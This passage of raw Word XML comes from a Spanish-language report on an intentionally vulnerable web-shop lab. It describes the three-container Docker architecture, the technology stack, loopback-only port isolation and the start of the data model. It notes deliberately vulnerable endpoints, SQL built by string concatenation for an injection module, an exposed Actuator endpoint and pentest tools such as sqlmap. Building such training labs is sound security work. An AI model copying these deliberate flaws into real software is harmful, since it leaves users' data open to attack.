      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A875BF7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Arquitectura de despliegue y tecnologías</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFC35D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">La solución utiliza una arquitectura de tres capas implementada mediante tres servicios Docker. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> presenta la interfaz web y actúa como reverse proxy; Spring </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Boot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> expone la API REST y</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> ejecuta la lógica vulnerable; PostgreSQL mantiene usuarios, categorías, productos, pedidos e ítems de pedido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745675D6" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Arquitectura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lógica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33F395A5" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing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8A55B95" wp14:editId="3AB740F1">
            <wp:extent cx="6048000" cy="336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_v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09B02" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Figura 1. Arquitectura lógica y controles de contención del laboratorio V1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52075AD1" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">navegador puede acceder a la tienda mediante </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el puerto 3000. Las herramientas de prueba también pueden comunicarse directamente con el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el puerto 8080. El </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> consulta PostgreSQL mediante JDBC/JPA. La red Docker facilita la comunicac</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">ión por nombres de servicio, por </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ejemplo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> backend:8080 y postgres:5432.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F33DB83" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Tecnologías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utilizadas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721"/>
        <w:gridCol w:w="4932"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="0B8CFAA6" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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93DC2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Capa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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2F70B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Tecnología</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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0C4A58" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Responsabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="2E53FEF6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785C57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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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7B4BA0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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">HTML5, CSS3 y JavaScript </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>vanilla</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="49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1100AF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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Páginas estáticas, formularios y consumo de la API con </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>fetch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="47822280" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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68DE7C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Proxy web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721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2C20F3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Nginx 1.27 Alpine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4932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F8E550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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Sirve el </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>frontend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y reenvía /api y /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>actuator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> al </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>backend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="1C155B49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26CAD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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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C0236E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Java 17 y Spring Boot 3.2.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="49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1C1318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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">API REST, autenticación JWT manual, lógica de negocio y </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>endpoints</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> vulnerables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="1E9E4EEF" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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5BB1A5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Persistencia</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721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BAF4A3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Spring Data JPA y JdbcTemplate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4932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47E80E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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>JPA para entidades n</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">ormales; JDBC por concatenación en el módulo </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="3F1864B5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46E53D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 xml:space="preserve">Base de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>datos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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D53AC3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PostgreSQL 16 Alpine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="49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C305F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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Almacena usuarios, categorías, productos, pedidos e ítems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="498E777F" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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DC5670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Contenedores</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721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ECC2A2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Docker y Docker Compose v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4932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F38050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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Construcción, red, volumen y arranque reproducible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="2E2E27CD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8B1554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Pentesting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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BE41AE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PowerShell, curl, sqlmap y Dependency-Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="49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EAAE52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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Pruebas manuales, automatizadas y análisis de dependencias.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BB9BD2A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9AB7FE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Puertos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>aislamiento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2381"/>
        <w:gridCol w:w="4365"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="7AEA7240" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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916CE8" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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0BCDC1" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Puerto del host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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E15E45" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="353615D4" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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2E04C1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lastRenderedPageBreak/>
              <w:t>Frontend Nginx</w:t>
            </w:r>
          </w:p>
        </w:tc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790B32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127.0.0.1:3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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AF6804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Tienda web.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="08341F61" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608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F03E94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Backend Spring Boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381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DA86D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127.0.0.1:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365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5356C2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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">API REST y </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Actuator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> expuesto en la V1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="12D69DF5" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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489FA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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc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4E2F70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127.0.0.1:5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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7E9995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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Inspección de la base de datos desde el host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E7675A7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="71D60646" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="8A5A00"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil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8C639B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="8A5A00"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Aislamiento: </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Los puertos se publican únicamente en </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>loopback</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>. Si Docker muestra la columna PORTS vacía, aplicar el archivo de co</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>mpatibilidad del Anexo B y recrear los contenedores.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3ABBAAE2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Modelo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>datos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798"/>
        <w:gridCol w:w="3572"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="4BDD8278" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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9778E4" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Tabla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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05A608" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3572" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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BF6DA0" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Relaciones principales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="5E3BB8A8" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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E30C70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usuarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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60EC2C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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Credenciales y rol del usuario.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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511266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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Un usuario realiza muchos pedidos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="2960ADAA" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984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27EA8F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categorias</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798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5E4E81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Clasificación del catálogo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3572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F6B3E9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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Una categoría </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>contiene muchos productos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="59AD5DF1" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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F31930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productos</w:t>
            </w:r>
